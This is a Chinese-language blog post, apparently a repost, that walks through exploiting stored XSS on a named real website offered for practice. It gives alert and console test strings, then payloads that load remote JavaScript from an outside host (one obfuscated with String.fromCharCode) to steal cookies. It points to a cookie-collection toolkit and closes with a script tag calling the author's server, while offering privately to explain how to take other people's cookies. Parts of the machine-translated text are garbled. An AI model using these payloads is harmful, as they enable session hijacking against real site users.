漏洞利用的过程

漏洞利用的过程,第1张

XSS漏洞实例利用


上一篇文章谈到了XSS原理,我坚信每个人都对XSS原理有一定的掌握。今天,让我们分享XSS系统漏洞的案例。


自然环境:

Window764位集

搜狗浏览器到位

外网云服务(自己买的...)

一个XSS网址是可用的。

为Cookie获取一组JS代码

好了,下面是必须提前准备的物品。如果没有外部云服务器(外部IP),可以使用XSS的发布服务平台。如何在自己的科研下使用(我的在线服务器也不公布,太差了,不能只公布测试...)


现在大家才开始一步步利用XSS系统的漏洞。


0x0...皮皮猎.....我浏览了Kex的网站。

(网站发布在这里,方便同学们自己学习,训练,测试。请不要闹事,避免从新手XSS到公安局入门。)

#必须申请注册一个账户,可X点坐落于写日记一部分 http://www.vbao100.com/


0x01我刚开始检查有没有X(一切正常)

#经典测试程序 <script>alert(1)</script> #猥亵版测试程序(必须在火狐插件firebug中查询防御性好不容易被管理人员发觉相对性d出窗口) console.log(1)


0x02啊啊啊啊...d出窗口(XSS被清楚地存储)

在日记标题中插入测试程序,点击浏览(表格(不需要)会被公布...它将得到管理层的批准)


0x03清除存储的XSS...可以使用...呵呵....

再说一遍XSS的工资。

<script src='http://b.ioio.pub/xss/probe.js'</script> <img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http:// b.ioio.pub/xss/probe.js'";> <svg onload=s=createElement('script');body.appendChild(s);s.src='http:// b.ioio.pub/xss/probe.js> <svg onload= eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109, 101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,9 7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114, 99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98, 47,120,115,115,47,112,114,111,98,101,46,106,115)) >

当上面的logo打开时,会从遥控器加载JS代码,也就是说你可以通过改变遥控器的JS代码来完成不同的功能。

大家也看到了上面的连接,无疑不是我的...它来自上级JS获取COOKIE代码。

分享:

https://github.com/evilcos/xssprobe

关键文档有三个,告诉你这三个脚本是干什么用的,详细介绍编码含义,不太实际。

第一个:

这一脚本制作便是必须远程控制载入的JS获得Cookie的编码(能够下载一下放进自身的网络服务器上或XSS服务平台) 里边有一段必须改动的地区 http_server = " #  这一段必须改动给自己网络服务器的详细地址和接纳数据信息的PHP文档

第二个:

这一便是上边提及的必须接纳数据信息的PHP文档这一文档不用改动。 其功效是将接纳的数据信息载入到第三个文档中。

第三个:

它是便是你获得cookie后显示信息cookie的地区。根据第一文档获得到cookie随后传个第二个文档由第二个 文档载入到这一文档中显示信息出去。

0x04刚开始用...结构利用编码。

<script src='http://xx.xx.xx.xx/xsstest.js' /> (xx.xx.xx.xx是我的云服务器)

好了,结构准备好了,接下来测试一下是否成功...检查你申请的账户...(如何拿到别人的cookie,看你自己的想法,需要私聊我会告诉你...)

好的...现在看设计效果图。....


现在每个人都成功地得到了自己的饼干...O(∩_∩)O~

(再次声明,请学生不要制造麻烦,只是为了测试应用程序...)

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zz/778569.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-03
下一篇 2022-05-03

发表评论

登录后才能评论

评论列表(0条)

保存